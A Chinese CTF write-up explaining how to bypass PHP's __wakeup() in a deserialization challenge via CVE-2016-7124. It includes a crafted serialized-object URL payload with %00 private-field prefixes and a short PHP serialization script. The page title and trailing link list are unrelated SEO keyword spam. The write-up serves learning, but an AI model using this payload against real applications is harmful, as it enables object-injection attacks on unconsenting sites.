当前位置: 首页 > news >正文

网站编辑 seo是什么 百度知道网站设计网站建设毕业文稿

网站编辑 seo是什么 百度知道,网站设计网站建设毕业文稿,深色系网站,网页游戏吃显卡还是cpu1.通过目录扫描找到它的备份文件,这里的备份文件是它的源码。 2.源码当中涉及到的关键点就是魔术函数以及序列化与反序列化。 我们提交的select参数会被进行反序列化,我们要构造符合输出flag条件的序列化数据。 但是,这里要注意的就是我们提…

1.通过目录扫描找到它的备份文件,这里的备份文件是它的源码。

2.源码当中涉及到的关键点就是魔术函数以及序列化与反序列化。

我们提交的select参数会被进行反序列化,我们要构造符合输出flag条件的序列化数据。

但是,这里要注意的就是我们提前序列化好的数据,在进行反序列化之前,会执行wakeup函数,而这里一旦执行wakeup函数,就会把我们的参数给改了,那就会不满足输出flag的条件。所以这里需要绕过这个wakeup函数,需要利用的就是绕过wakeup函数的漏洞。

利用CVE-2016-7124漏洞绕过__wakeup()函数

CVE-2016-7124:当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup()的执行。

这是正常的:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

改成可以绕过的:O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

把表示属性个数的值修改为大于实际的即可。

但是直接把这个构造的数据提交还是不行,因为

private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上一个url编码为%00的字符前缀,但是这个前缀是不可见的,并且在复制的时候会丢失。字符串长度也包括所加前缀的长度,所以复制下来之后再去添加即可。

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;s:3:%22100%22;}

3.序列化的代码

总结:反序列化对象的时候,会触发wakeup函数,之后对象销毁还会触发destruct函数,但是不会触发construct函数。

<?php
class Name{
private $username = 'admin';
private $password = '100';#这里也可以换成数字100
}
$name = new Name;
print(serialize($name));
?>
 

http://www.yayakq.cn/news/10443/

相关文章:

  • 江西东乡网站建设wordpress 论坛
  • 网站结构优化的内容和方法鄱阳电商网站建设
  • 哪里有网站推广软件app模板网站
  • 高端网站建设企业官网建设零售管理系统软件
  • 什么网站可以做微招聘给女朋友做网站 知乎
  • 学院的网站怎么做英文服装商城网站建设
  • 重生做网站的小说怎么在html链接wordpress
  • 公司网站建设为什么不直接买模版高薪聘请网站开发工程师
  • 山东省建设厅网站多少ios应用商店下载
  • 宁波网站建设设计服务公司职业生涯规划大赛成长赛道
  • 如何利用wordpress编辑网站优化网站制作公司好吗
  • 网站建设与电子商务的教案网站建设服务器价格
  • 用asp做网站怎么美观做美食软件视频网站有哪些
  • 金融企业网站建设搜索引擎优化排名工具
  • 怎样在网站上做专栏文字壁纸做背景处理的网站
  • 合肥网站建设cnfg十个源码网站
  • 丽水品牌网站建设网站开发工具链接服务器
  • 手机百度网页版入口seo网站优化推荐
  • 做搜索的网站网络建站 响应式网站
  • 公司付网站会员费科目怎么做python和php网站开发
  • 汕头企业建站系统手机网站广告代码
  • 娱乐网站开发spspwk网站视觉优化的意义
  • 自助建站和速成网站驾校报名网站怎么做
  • 装修行业门户网站模板广州白云会议中心分析
  • 梁山网站建设哪家好怎样做网络推广引流
  • 网站建设的公司平台研发
  • 网站建设与管理的内容全国企业名单大全
  • 如何做网站线上监控婚庆公司宣传文案
  • 网站做指向是什么意思娱乐网站导航
  • 石桥铺网站建设旅行社手机网站建设方案